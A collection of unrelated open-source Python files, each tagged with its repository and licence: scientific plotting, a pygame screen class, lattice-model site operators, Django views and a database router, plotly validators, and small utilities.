arg = (isamples[:] >= bin_vertices[n_arg_min - 1]) * \
(isamples[:] <= bin_vertices[n_arg_max + 1])
if gaussian_fit:
ax[0].hist(isamples[arg], bins=bin_vertices,
facecolor='gray', edgecolor='darkgray',
histtype='stepfilled', alpha=0.5)
ax[0].vlines(val_max[pKey[j]], 0, n[int(n_arg_sort[0])],
linestyles='dashed', color='red')
ax[0].set_xlabel(label[j])
if j == 0:
ax[0].set_ylabel('Counts')
if title is not None:
msg = r"{}: {:.3f} {:.3f} +{:.3f}"
ax[0].set_title(msg.format(lab, val_max[pKey[j]],
confidenceInterval[pKey[j]][0],
confidenceInterval[pKey[j]][1]),
fontsize=10)
mu[j], sigma[j] = norm.fit(isamples[:])
n_fit, bins_fit = np.histogram(isamples[:], bins, density=1,
weights=weights)
ax[1].hist(isamples[:], bins, density=1, weights=weights,
facecolor='gray', edgecolor='darkgray',
histtype='step')
y = norm.pdf(bins_fit, mu[j], sigma[j])
ax[1].plot(bins_fit, y, 'r--', linewidth=2, alpha=0.7)
ax[1].set_xlabel(label[j])
if j == 0:
ax[1].set_ylabel('Counts')
if title is not None:
msg = r"{}: $\mu$ = {:.4f}, $\sigma$ = {:.4f}"
ax[1].set_title(msg.format(lab, mu[j], sigma[j]),
fontsize=10)
else:
ax.hist(isamples[arg],bins=bin_vertices, facecolor='gray',
edgecolor='darkgray', histtype='stepfilled',
alpha=0.5)
ax.vlines(val_max[pKey[j]], 0, n[int(n_arg_sort[0])],
linestyles='dashed', color='red')
ax.set_xlabel(label[j])
if j == 0:
ax.set_ylabel('Counts')
if title is not None:
msg = r"{}: {:.3f} {:.3f} +{:.3f}"
ax.set_title(msg.format(lab, val_max[pKey[j]],
confidenceInterval[pKey[j]][0],
confidenceInterval[pKey[j]][1]),
fontsize=10)
plt.tight_layout(w_pad=0.1)
if save:
if gaussian_fit:
plt.savefig(output_dir+'confi_hist_flux_r_theta_gaussfit.pdf')
else:
plt.savefig(output_dir+'confi_hist_flux_r_theta.pdf')
if verbose:
print('\n\nConfidence intervals:')
if l>1:
print('r: {} [{},{}]'.format(val_max['r'],
confidenceInterval['r'][0],
confidenceInterval['r'][1]))
print('theta: {} [{},{}]'.format(val_max['theta'],
confidenceInterval['theta'][0],
confidenceInterval['theta'][1]))
print('flux: {} [{},{}]'.format(val_max['f'],
confidenceInterval['f'][0],
confidenceInterval['f'][1]))
if gaussian_fit:
print()
print('Gaussian fit results:')
if l>1:
print('r: {} +-{}'.format(mu[0], sigma[0]))
print('theta: {} +-{}'.format(mu[1], sigma[1]))
print('f: {} +-{}'.format(mu[2], sigma[2]))
else:
print('f: {} +-{}'.format(mu[0], sigma[0]))
##############################################
## Write inference results in a text file ##
##############################################
if save:
with open(output_dir+output_file, "w") as f:
f.write('###########################\n')
f.write('#### INFERENCE TEST ###\n')
f.write('###########################\n')
f.write(' \n')
f.write('Results of the MCMC fit\n')
f.write('----------------------- \n')
f.write(' \n')
f.write('>> Position and flux of the planet (highly probable):\n')
f.write('{} % confidence interval\n'.format(cfd))
f.write(' \n')
for i in range(l):
confidenceMax = confidenceInterval[pKey[i]][1]
confidenceMin = -confidenceInterval[pKey[i]][0]
if i == 2 or l==1:
text = '{}: \t\t\t{:.3f} \t-{:.3f} \t+{:.3f}\n'
else:
text = '{}: \t\t\t{:.3f} \t\t-{:.3f} \t\t+{:.3f}\n'
f.write(text.format(pKey[i], val_max[pKey[i]],
confidenceMin, confidenceMax))
if l>1 and plsc is not None:
                f.write(' \n')
f.write('Platescale = {} mas\n'.format(plsc*1000))
f.write('r (mas): \t\t{:.2f} \t\t-{:.2f} \t\t+{:.2f}\n'.format(
val_max[pKey[0]]*plsc*1000,
-confidenceInterval[pKey[0]][0]*plsc*1000,
confidenceInterval[pKey[0]][1]*plsc*1000))
if gaussian_fit:
return mu, sigma
else:
return val_max, confidenceInterval | vortex-exoplanet/VIP | vip_hci/fm/negfc_mcmc.py | Python | mit | 57,611 |
import pygame
import math
class Screen:
'''
    Controls what the player sees on the screen.
    Parameters
    ----------
    size : List[int]
        Size of the screen, ``[w, h]``.
    Notes
    -----
    First create an instance of this object; then, in every loop of the
    game you must (in order):
    - Paint the screen with ``fill()`` to cover the previous frame.
    - Draw all the sprites with ``draw()``.
    - Update the screen with ``update()``.
    Examples
    --------
    Here is a usage example::
        # create the screen
        screen = toledo.graphics.Screen(screen_size)
        ...
        def loop(): # function executed once per frame
            ...
            # paint the screen black to cover the previous frame
            screen.fill(toledo.graphics.Color.from_name("black"))
            # draw everything that is needed
            screen.draw(......)
            screen.draw(......)
            screen.draw(......)
            # finally, update the screen
            screen.update()
'''
ANCHOR_TOP_LEFT = 0
'''
    int : Anchor to the top-left corner. See the ``draw()`` method.
'''
ANCHOR_CENTER = 1
'''
    int : Anchor to the center. See the ``draw()`` method.
'''
def __init__(self, size):
self._screen = pygame.display.set_mode(size)
def fill(self, color):
'''
        Paint the whole screen with a single color.
        Parameters
        ----------
        color : toledo.graphics.Color
            Color to use.
'''
self._screen.fill(color.get_tuple())
def draw(self, sprite, rect, angle=0, smooth=False, anchor=None):
'''
        Draw a sprite on the screen.
        The changes will not be visible until ``Screen.update()`` is
        called.
        Parameters
        ----------
        sprite : toledo.graphics.Sprite
            Sprite to draw.
        rect : toledo.Rect
            Position on the screen where to draw. The given size is respected.
        angle : :obj:`float`, optional
            Rotation angle in degrees, counter-clockwise.
        smooth : :obj:`bool`, optional
            Whether or not to use antialiasing.
        anchor : :obj:`int`, optional
            Type of anchoring to use (e.g. centered or cornered). Use the
            defined constants, e.g. ``Screen.ANCHOR_CENTER`` or
            ``Screen.ANCHOR_TOP_LEFT``.
            The default is a top-left anchor.
        Examples
        --------
        Usage example::
            screen = toledo.graphics.Screen(screen_size)
            ...
            def loop():
                ...
                screen.draw(sprite_ball, rect_ball, angle=angle_ball,
                            smooth=True, anchor=screen.ANCHOR_TOP_LEFT)
'''
image = sprite.get_pygame_image()
size = [int(rect.w), int(rect.h)]
angle = angle % 360
if size[0] == 0 or size[1] == 0:
return
pos = self._get_pos(rect, angle, anchor)
        # the order matters: scale first, then rotate
image = self._scale_image(image, size, smooth)
image = self._rotate_image(image, angle, smooth)
self._screen.blit(image, pos)
def update(self):
'''
        Update what is shown on the screen.
'''
pygame.display.flip()
def _scale_image(self, image, size, smooth):
'''
        Scale the image to the given size.
        Parameters
        ----------
        image : pygame.Surface
            Image to scale.
        size : List[int]
            Target size, ``[w, h]``.
        smooth : bool
            Whether or not to use antialiasing.
        Returns
        -------
        pygame.Surface
            Scaled image.
'''
        # make a copy so the original list is not modified
size = size[:]
if size[0] < 0:
size[0] *= -1
image = pygame.transform.flip(image, True, False)
if size[1] < 0:
size[1] *= -1
image = pygame.transform.flip(image, False, True)
if smooth:
return pygame.transform.smoothscale(image, size)
else:
return pygame.transform.scale(image, size)
def _rotate_image(self, image, angle, smooth):
'''
        Rotate the image by the given angle.
        Parameters
        ----------
        image : pygame.Surface
            Image to rotate.
        angle : float
            Rotation angle in degrees, counter-clockwise.
        smooth : bool
            Whether or not to use antialiasing.
        Returns
        -------
        pygame.Surface
            Rotated image.
'''
if smooth:
return pygame.transform.rotozoom(image, angle, 1)
else:
return pygame.transform.rotate(image, angle)
def _get_pos(self, rect, angle, anchor):
'''
        Compute the correct position at which to draw the texture; ``pygame``
        needs the position of the top-left corner.
        Implements the behaviour of the anchors.
        Parameters
        ----------
        rect : toledo.Rect
            Position and size of the image as given by the user (not the final
            size after rotation).
        angle : float
            Rotation angle in degrees, counter-clockwise.
        anchor : int
            Type of anchoring to use.
        Returns
        -------
        List[int]
            Position at which the image must be drawn with ``pygame`` so that
            it ends up in the correct place. ``[x, y]``.
'''
pos = [None, None]
angle_rads = math.radians(angle)
        # compute the size of the already-rotated image, always positive. There
        # may be a better way, but this works
rotated_size = [
abs(abs(rect.w) * math.cos(angle_rads)) +
abs(abs(rect.h) * math.sin(angle_rads)),
abs(abs(rect.h) * math.cos(angle_rads)) +
abs(abs(rect.w) * math.sin(angle_rads))
]
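        # (this is the axis-aligned bounding box of the w x h rectangle rotated
        # by `angle`: width = |w*cos| + |h*sin|, height = |h*cos| + |w*sin|)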
if anchor == None:
anchor = self.ANCHOR_TOP_LEFT
if anchor == self.ANCHOR_CENTER:
pos = [rect.x - rotated_size[0] / 2,
rect.y - rotated_size[1] / 2]
elif anchor == self.ANCHOR_TOP_LEFT:
            # correction for rotated images. There may also be a better way
            # to do this
if angle > 0 and angle <= 90:
correction = [
0,
abs(abs(rect.w) * math.sin(angle_rads))
]
elif angle > 90 and angle <= 180:
correction = [
abs(abs(rect.w) * math.cos(angle_rads)),
rotated_size[1]
]
elif angle > 180 and angle <= 270:
correction = [
rotated_size[0],
abs(abs(rect.h) * math.cos(angle_rads)),
]
else:
correction = [
abs(abs(rect.h) * math.sin(angle_rads)),
0
]
            # when the width is negative, the left edge becomes what was
            # originally the right edge
if rect.w < 0:
pos[0] = rect.x - abs(rect.w)
else:
pos[0] = rect.x - correction[0]
            # the same applies to the top edge
if rect.h < 0:
pos[1] = rect.y - abs(rect.h)
else:
pos[1] = rect.y - correction[1]
else:
print("ERROR")
return pos
| toboso-team/toledo | toledo/graphics/screen.py | Python | mit | 7,808 |
import numpy as np
class Site(object):
"""A class for general single site
    Use this class to create a single site object. The site comes with an
    identity operator for the given dimension. To build a specific site, add
    the additional operators you need with the add_operator method.
"""
def __init__(self, dim):
"""Creates an empty site of dimension dim.
Parameters
----------
dim : an int
            Size of the Hilbert space for a single site. The dimension must be
            at least 1. A site of dim = 1 is trivial and represents the vacuum.
operators : a dictionary of string and numpy array (with ndim = 2).
Operators for the site.
"""
super(Site, self).__init__()
self.dim = dim
self.states = {}
self.operators = { "id" : np.eye(self.dim, self.dim) }
def add_operator(self, operator_name):
"""Adds an operator to the site with zero matrix.
Parameters
----------
operator_name : string
The operator name.
"""
self.operators[str(operator_name)] = np.zeros((self.dim, self.dim))
def add_state(self, state_name):
"""Adds an state to the site with zero list.
Parameters
----------
        state_name : string
            The state name.
"""
self.states[str(state_name)] = np.zeros(self.dim)
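# A minimal usage sketch (illustration only, not part of the original module):
# a custom two-level site can be built by filling in an operator added with
# add_operator, e.g. a lowering operator "a":
#
#     site = Site(2)
#     site.add_operator("a")
#     site.operators["a"][0, 1] = 1.0   # <0|a|1> = 1
#     site.add_state("ground")
#     site.states["ground"][0] = 1.0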
class SpinlessFermionSite(Site):
"""A site for spinless fermion models.
Use this class for spinless fermion sites. The Hilbert space is ordered
such as:
- the first state is empty site
- the second state is occupied site.
Notes
-----
Postcondition : The site has already built-in the operators for
c, c_dag, n.
"""
def __init__(self):
"""Creates the spin one-half site.
Notes
-----
Postcond : the dimension is set to 2
"""
super(SpinlessFermionSite, self).__init__(2)
# add the operators
self.add_operator("c")
self.add_operator("c_dag")
self.add_operator("n")
# for clarity
c = self.operators["c"]
c_dag = self.operators["c_dag"]
n = self.operators["n"]
# set the matrix elements different from zero to the right values
c[0, 1] = 1
c_dag[1, 0] = 1
n[1, 1] = 1
# add the states
self.add_state("empty")
self.add_state("occupied")
# for clarity
state_empty = self.states["empty"]
state_occupied = self.states["occupied"]
# set the list elements different from zero to the right values
state_empty[0] = 1.0
state_occupied[1] = 1.0
class SpinOneHalfSite(Site):
"""A site for spin 1/2 models.
Use this class for spin one-half sites. The Hilbert space is ordered
such as the first state is the spin down, and the second state is the
spin up.
Notes
-----
Postcondition : The site has already built-in the spin operators for
s_x, s_y, s_z, s_p, s_m.
"""
def __init__(self):
"""Creates the spin one-half site.
Notes
-----
Postcond : the dimension is set to 2
"""
super(SpinOneHalfSite, self).__init__(2)
# add the operators
self.add_operator("s_x")
self.add_operator("s_y")
self.add_operator("s_z")
self.add_operator("s_p")
self.add_operator("s_m")
# for clarity
s_x = self.operators["s_x"]
s_y = self.operators["s_y"]
s_y = s_y.astype(np.complex)
s_z = self.operators["s_z"]
s_p = self.operators["s_p"]
s_m = self.operators["s_m"]
# set the matrix elements different from zero to the right values
s_x[0, 1] = 0.5
s_x[1, 0] = 0.5
s_y[0, 1] = 1j*(-0.5)
s_y[1, 0] = 1j*0.5
s_z[0, 0] = -0.5
s_z[1, 1] = 0.5
s_p[1, 0] = 1.0
s_m[0, 1] = 1.0
# add the states
self.add_state("spin_up")
self.add_state("spin_down")
self.add_state("empty")
self.add_state("occupied")
# for clarity
state_up = self.states["spin_up"]
state_down = self.states["spin_down"]
state_empty = self.states["empty"]
state_occupied = self.states["occupied"]
# set the list elements different from zero to the right values
state_up[1] = 1.0
state_down[0] = 1.0
state_occupied[1] = 1.0
state_empty[0] = 1.0
class ElectronicSite(Site):
"""A site for electronic models
You use this site for models where the single sites are electron
sites. The Hilbert space is ordered such as:
- the first state, labelled 0, is the empty site,
- the second, labelled 1, is spin down,
- the third, labelled 2, is spin up, and
- the fourth, labelled 3, is double occupancy.
Notes
-----
Postcond: The site has already built-in the spin operators for:
    - c_up : destroys a spin-up electron,
    - c_up_dag, creates a spin-up electron,
    - c_down, destroys a spin-down electron,
    - c_down_dag, creates a spin-down electron,
- s_z, component z of spin,
- s_p, raises the component z of spin,
- s_m, lowers the component z of spin,
- n_up, number of electrons with spin up,
- n_down, number of electrons with spin down,
- n, number of electrons, i.e. n_up+n_down, and
- u, number of double occupancies, i.e. n_up*n_down.
"""
def __init__(self):
super(ElectronicSite, self).__init__(4)
# add the operators
self.add_operator("c_up")
self.add_operator("c_up_dag")
self.add_operator("c_down")
self.add_operator("c_down_dag")
self.add_operator("s_z")
self.add_operator("n_up")
self.add_operator("n_down")
self.add_operator("n")
self.add_operator("u")
# for clarity
c_up = self.operators["c_up"]
c_up_dag = self.operators["c_up_dag"]
c_down = self.operators["c_down"]
c_down_dag = self.operators["c_down_dag"]
s_z = self.operators["s_z"]
n_up = self.operators["n_up"]
n_down = self.operators["n_down"]
n = self.operators["n"]
u = self.operators["u"]
# set the matrix elements different from zero to the right values
c_up[0,2] = 1.0
c_up[1,3] = 1.0
c_up_dag[2,0] = 1.0
c_up_dag[3,1] = 1.0
c_down[0,1] = 1.0
c_down[2,3] = 1.0
c_down_dag[1,0] = 1.0
c_down_dag[3,2] = 1.0
s_z[1,1] = -1.0
s_z[2,2] = 1.0
n_up[2,2] = 1.0
n_up[3,3] = 1.0
n_down[1,1] = 1.0
n_down[3,3] = 1.0
n[1,1] = 1.0
n[2,2] = 1.0
n[3,3] = 2.0
u[3,3] = 1.0
# add the states
self.add_state("empty")
self.add_state("spin_down")
self.add_state("spin_up")
self.add_state("double")
# for clarity
state_empty = self.states["empty"]
state_down = self.states["spin_down"]
state_up = self.states["spin_up"]
state_double = self.states["double"]
# set the list elements different from zero to the right values
state_empty[0] = 1.0
state_down[1] = 1.0
state_up[2] = 1.0
state_double[3] = 1.0
| fhqgfss/MoHa | moha/modelsystem/sites.py | Python | mit | 7,169 |
import datetime
import json
from brake.decorators import ratelimit
from django.utils.decorators import method_decorator
from django.utils.translation import get_language
from django.conf import settings
from django.core.urlresolvers import reverse_lazy
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import redirect
from django.views.generic import FormView
from django.template import RequestContext
import logging
logger = logging.getLogger(__name__)
from django.contrib.admin.views.decorators import staff_member_required
from apps.forms.stages import MultiStageForm
from apps.forms.views import StorageView
from make_a_plea.helpers import (
filter_cases_by_month,
get_supported_language_from_request,
parse_date_or_400,
staff_or_404,
)
from .models import Case, Court, CaseTracker
from .forms import CourtFinderForm
from .stages import (URNEntryStage,
AuthenticationStage,
NoticeTypeStage,
CaseStage,
YourDetailsStage,
CompanyDetailsStage,
PleaStage,
YourStatusStage,
YourEmploymentStage,
YourSelfEmploymentStage,
YourOutOfWorkBenefitsStage,
AboutYourIncomeStage,
YourBenefitsStage,
YourPensionCreditStage,
YourIncomeStage,
HardshipStage,
HouseholdExpensesStage,
OtherExpensesStage,
CompanyFinancesStage,
ReviewStage,
CompleteStage)
from .fields import ERROR_MESSAGES
class PleaOnlineForms(MultiStageForm):
url_name = "plea_form_step"
stage_classes = [URNEntryStage,
AuthenticationStage,
NoticeTypeStage,
CaseStage,
YourDetailsStage,
CompanyDetailsStage,
PleaStage,
YourStatusStage,
YourEmploymentStage,
YourSelfEmploymentStage,
YourOutOfWorkBenefitsStage,
AboutYourIncomeStage,
YourBenefitsStage,
YourPensionCreditStage,
YourIncomeStage,
HardshipStage,
HouseholdExpensesStage,
OtherExpensesStage,
CompanyFinancesStage,
ReviewStage,
CompleteStage]
def __init__(self, *args, **kwargs):
super(PleaOnlineForms, self).__init__(*args, **kwargs)
self._urn_invalid = False
def save(self, *args, **kwargs):
"""
Check that the URN has not already been used.
"""
saved_urn = self.all_data.get("case", {}).get("urn")
saved_first_name = self.all_data.get("your_details", {}).get("first_name")
saved_last_name = self.all_data.get("your_details", {}).get("last_name")
if all([
saved_urn,
saved_first_name,
saved_last_name,
not Case.objects.can_use_urn(saved_urn, saved_first_name, saved_last_name)
]):
self._urn_invalid = True
else:
return super(PleaOnlineForms, self).save(*args, **kwargs)
def render(self, request, request_context=None):
request_context = request_context if request_context else {}
if self._urn_invalid:
return redirect("urn_already_used")
return super(PleaOnlineForms, self).render(request)
class PleaOnlineViews(StorageView):
start = "enter_urn"
def __init__(self, *args, **kwargs):
super(PleaOnlineViews, self).__init__(*args, **kwargs)
self.index = None
self.storage = None
def dispatch(self, request, *args, **kwargs):
# If the session has timed out, redirect to start page
if all([
not request.session.get("plea_data"),
kwargs.get("stage", self.start) != self.start,
]):
return HttpResponseRedirect("/")
# Store the index if we've got one
idx = kwargs.pop("index", None)
try:
self.index = int(idx)
except (ValueError, TypeError):
self.index = 0
# Load storage
self.storage = self.get_storage(request, "plea_data")
return super(PleaOnlineViews, self).dispatch(request, *args, **kwargs)
def get(self, request, stage=None):
if not stage:
stage = PleaOnlineForms.stage_classes[0].name
return HttpResponseRedirect(reverse_lazy("plea_form_step", args=(stage,)))
form = PleaOnlineForms(self.storage, stage, self.index)
case_redirect = form.load(RequestContext(request))
if case_redirect:
return case_redirect
form.process_messages(request)
if stage == "complete":
self.clear_storage(request, "plea_data")
return form.render(request)
@method_decorator(ratelimit(block=True, rate=settings.RATE_LIMIT))
def post(self, request, stage):
nxt = request.GET.get("next", None)
form = PleaOnlineForms(self.storage, stage, self.index)
form.save(request.POST, RequestContext(request), nxt)
if not form._urn_invalid:
form.process_messages(request)
request.session.modified = True
return form.render(request)
def render(self, request, request_context=None):
request_context = request_context if request_context else {}
return super(PleaOnlineViews, self).render(request)
class UrnAlreadyUsedView(StorageView):
template_name = "urn_used.html"
def post(self, request):
del request.session["plea_data"]
return redirect("plea_form_step", stage="case")
class CourtFinderView(FormView):
template_name = "court_finder.html"
form_class = CourtFinderForm
def form_valid(self, form):
try:
court = Court.objects.get_court_dx(form.cleaned_data["urn"])
except Court.DoesNotExist:
court = False
return self.render_to_response(
self.get_context_data(
form=form,
court=court,
submitted=True,
)
)
@staff_or_404
def stats(request):
"""
Generate usage statistics (optionally by language) and send via email
"""
filter_params = {
"sent": True,
"language": get_supported_language_from_request(request),
}
if "end_date" in request.GET:
end_date = parse_date_or_400(request.GET["end_date"])
else:
now = datetime.datetime.utcnow()
last_day_of_last_month = now - datetime.timedelta(days=now.day)
end_date = datetime.datetime(
last_day_of_last_month.year,
last_day_of_last_month.month,
last_day_of_last_month.day,
23, 59, 59)
filter_params["completed_on__lte"] = end_date
if "start_date" in request.GET:
start_date = parse_date_or_400(request.GET["start_date"])
else:
start_date = datetime.datetime(1970, 1, 1)
filter_params["completed_on__gte"] = start_date
journies = Case.objects.filter(**filter_params).order_by("completed_on")
count = journies.count()
journies_by_month = filter_cases_by_month(journies)
earliest_journey = journies[0] if journies else None
latest_journey = journies.reverse()[0] if journies else None
response = {
"summary": {
"language": filter_params["language"],
"total": count,
"start_date": start_date.isoformat(),
"end_date": end_date.isoformat(),
"earliest_journey": earliest_journey.completed_on.isoformat() if earliest_journey else None,
"latest_journey": latest_journey.completed_on.isoformat() if latest_journey else None,
"by_month": journies_by_month,
},
"latest_example": {
"urn": latest_journey.urn,
"name": latest_journey.name,
"extra_data": {
k: v
for k, v in latest_journey.extra_data.items()
if k in [
"Forename1",
"Forename2",
"Surname",
"DOB",
]
},
}
} if count else {}
return HttpResponse(
json.dumps(response, indent=4),
content_type="application/json",
)
| ministryofjustice/manchester_traffic_offences_pleas | apps/plea/views.py | Python | mit | 8,700 |
class DatabaseRouter(object):
'''
These functions are called when Django accesses the database.
Returns the name of the database to use depending on the app and model.
Returning None means use default.
'''
def db_for_read(self, model, **hints):
return self.__db_for_read_and_write(model, **hints)
def db_for_write(self, model, **hints):
return self.__db_for_read_and_write(model, **hints)
def allow_relation(self, obj1, obj2, **hints):
return None
def allow_syncdb(self, db, model):
'''
Makes sure the correct databases are used when "python manage.py syncdb" is called.
Returning True means "model" should be synchronised with "db".
'''
allow = False
if db == 'default':
allow = model._meta.app_label != 'OGRgeoConverter'
allow = allow and model._meta.app_label != 'sessions'
elif db == 'sessions_db':
allow = model._meta.app_label == 'sessions'
elif db == 'ogrgeoconverter_db':
allow = model._meta.db_table != 'ogrgeoconverter_log_entries'
allow = allow and model._meta.db_table != 'ogrgeoconverter_ogr_log_entries'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_jobs'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_folders'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_file_matches'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_files'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_file_id_tracking'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_urls'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_shell_parameters'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_download_items'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_identification'
allow = allow and model._meta.app_label == 'OGRgeoConverter'
elif db == 'ogrgeoconverter_conversion_jobs_db':
allow = model._meta.db_table == 'ogrgeoconverter_conversion_jobs'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_folders'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_file_matches'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_files'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_file_id_tracking'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_urls'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_shell_parameters'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_download_items'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_identification'
allow = allow and model._meta.app_label == 'OGRgeoConverter'
elif db == 'ogrgeoconverter_log_db':
allow = model._meta.db_table == 'ogrgeoconverter_log_entries'
allow = allow or model._meta.db_table == 'ogrgeoconverter_ogr_log_entries'
allow = allow and model._meta.app_label == 'OGRgeoConverter'
else:
allow = None
return allow
def __db_for_read_and_write(self, model, **hints):
if model._meta.app_label == 'sessions':
return 'sessions_db'
elif model._meta.app_label == 'OGRgeoConverter':
if model._meta.db_table == 'ogrgeoconverter_log_entries' \
or model._meta.db_table == 'ogrgeoconverter_ogr_log_entries':
return 'ogrgeoconverter_log_db'
elif model._meta.db_table == 'ogrgeoconverter_conversion_jobs' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_folders' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_file_matches' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_files' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_file_id_tracking' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_urls' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_shell_parameters' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_download_items' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_identification':
return 'ogrgeoconverter_conversion_jobs_db'
else:
return 'ogrgeoconverter_db'
return None
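# Wiring sketch (assumption: this module is importable as "GeoConverter.database";
# adjust the dotted path to the actual project layout). Django consults the
# routers listed in settings.DATABASE_ROUTERS, and every alias used above must
# exist in settings.DATABASES:
#
#     # settings.py
#     DATABASE_ROUTERS = ['GeoConverter.database.DatabaseRouter']
#     DATABASES = {
#         'default': {...},
#         'sessions_db': {...},
#         'ogrgeoconverter_db': {...},
#         'ogrgeoconverter_conversion_jobs_db': {...},
#         'ogrgeoconverter_log_db': {...},
#     }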
| geometalab/geoconverter | GeoConverter/database.py | Python | mit | 4,858 |
SIMPLE_SETTINGS = {
'OVERRIDE_BY_ENV': True
}
MY_VAR = u'Some Value'
| drgarcia1986/simple-settings | tests/samples/special.py | Python | mit | 74 |
import _plotly_utils.basevalidators
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self,
plotly_name="size",
parent_name="histogram.marker.colorbar.tickfont",
**kwargs
):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
min=kwargs.pop("min", 1),
role=kwargs.pop("role", "style"),
**kwargs
)
| plotly/python-api | packages/python/plotly/plotly/validators/histogram/marker/colorbar/tickfont/_size.py | Python | mit | 541 |
# This code is supporting material for the book
# Building Machine Learning Systems with Python
# by Willi Richert and Luis Pedro Coelho
# published by PACKT Publishing
#
# It is made available under the MIT License
from load import load_dataset
import numpy as np
from threshold import learn_model, apply_model, accuracy
features, labels = load_dataset('seeds')
# Turn the labels into a binary array
labels = (labels == 'Canadian')
error = 0.0
for fold in range(10):
training = np.ones(len(features), bool)
# numpy magic to make an array with 10% of 0s starting at fold
training[fold::10] = 0
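    # i.e. samples at indices fold, fold+10, fold+20, ... are held out as the
    # test split for this fold; the remaining ~90% stay in the training split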
# whatever is not training is for testing
testing = ~training
model = learn_model(features[training], labels[training])
test_error = accuracy(features[testing], labels[testing], model)
error += test_error
error /= 10.0
print('Ten fold cross-validated error was {0:.1%}.'.format(error))
| krahman/BuildingMachineLearningSystemsWithPython | ch02/seeds_threshold.py | Python | mit | 921 |
# -*- coding: utf8 -*-
import re
from unidecode import unidecode
import os, sys
from hashlib import md5 as hasher
import binascii
import settings
def gen_flattened_list(iterables):
for item in iterables:
if hasattr(item, '__iter__'):
for i in item:
yield i
else:
yield item
def crc32(val):
return binascii.crc32(val) & 0xffffffff
# brennan added this
def wrap(text, width):
"""
A word-wrap function that preserves existing line breaks
and most spaces in the text. Expects that existing line
breaks are posix newlines (\n).
"""
return reduce(lambda line, word, width=width: '%s%s%s' %
(line,
' \n'[(len(line)-line.rfind('\n')-1
+ len(word.split('\n',1)[0]
) >= width)],
word),
text.split(' ')
)
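# Illustrative behaviour of wrap(): the words are joined back with either a
# space or a newline, starting a new line once the current line (measured from
# the last '\n') would reach `width` characters; pre-existing newlines are kept.
# For example, wrap("the quick brown fox jumps over the lazy dog", 15) returns
# "the quick brown\nfox jumps over\nthe lazy dog".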
_punct_re = re.compile(r'[\t !"#$%&\'()*\-/<=>?@\[\\\]^_`{|},.;:]+')
htmlCodes = (
('&', '&'),
('<', '<'),
('>', '>'),
('"', '"'),
(''', "'"),
)
def escape_html(s):
for bad, good in htmlCodes:
s = s.replace(bad, good)
return s
def slugify(text, delim='', lowercase=True):
"""ex: slugify(u'Шамиль Абетуллаев','')
returns u'shamilabetullaev'"""
text = escape_html(text)
result = []
if lowercase:
text=text.lower()
for word in _punct_re.split(text):
decoded = _punct_re.split(unidecode(word))
result.extend(decoded)
result = unicode(delim.join(result))
return result.lower() if lowercase else result
def salted_hash(val):
hash = hasher(settings.CRYPTO_SECRET)
hash.update(unicode(val, 'utf-8') if isinstance(val, str) else unicode(val))
return hash.hexdigest()
| jumoconnect/openjumo | jumodjango/etc/func.py | Python | mit | 1,840 |
#!/usr/bin/python
import urllib2
url = "http://localhost:8888/test/test.txt"
html = urllib2.urlopen(url).read()
print html
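# The second request below asks only for the tail of the file: the HTTP Range
# header requests bytes 10 through the end, so a server that supports ranges
# replies with "206 Partial Content" and only that slice of test.txt.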
send_headers = {
'range':'bytes=10-'
}
req = urllib2.Request(url, headers=send_headers)
html = urllib2.urlopen(req).read()
print html
| misilences/incipe | var/www/test/crawler/rbt.py | Python | mit | 266 |
N = int(input())
B = [int(x) for x in input().split()]
A = [10**5] * N
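# B[i] = max(A[i], A[i+1]) bounds both of its neighbours, so the sum of A is
# maximised by A[i] = min(B[i-1], B[i]) (the two end elements are bounded by a
# single B value); the loop below takes exactly these minima.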
for i, b in enumerate(B):
A[i] = min(A[i], b)
A[i+1] = min(A[i+1], b)
print(sum(A))
| knuu/competitive-programming | atcoder/abc/abc140_c.py | Python | mit | 163 |
#!/usr/bin/env python
'''coffeehandlers.py - Waqas Bhatti ([email protected]) - Jul 2014
This contains the URL handlers for the astroph-coffee web-server.
'''
import os.path
import logging
import base64
import re
LOGGER = logging.getLogger(__name__)
from datetime import datetime, timedelta
from pytz import utc, timezone
import tornado.web
from tornado.escape import xhtml_escape, xhtml_unescape, url_unescape, squeeze
import arxivdb
import webdb
import fulltextsearch as fts
import ipaddress
######################
## USEFUL CONSTANTS ##
######################
ARCHIVEDATE_REGEX = re.compile(r'^(\d{4})(\d{2})(\d{2})$')
MONTH_NAMES = {x:datetime(year=2014,month=x,day=12)
for x in range(1,13)}
######################
## USEFUL FUNCTIONS ##
######################
def msgencode(message, signer):
'''This escapes a message, then base64 encodes it.
Uses an itsdangerous.Signer instance provided as the signer arg to sign the
message to protect against tampering.
'''
try:
msg = base64.b64encode(signer.sign(xhtml_escape(message)))
msg = msg.replace('=','*')
return msg
except Exception as e:
return ''
def msgdecode(message, signer):
'''This base64 decodes a message, then unescapes it.
Uses an itsdangerous.Signer instance provided as the signer arg to verify
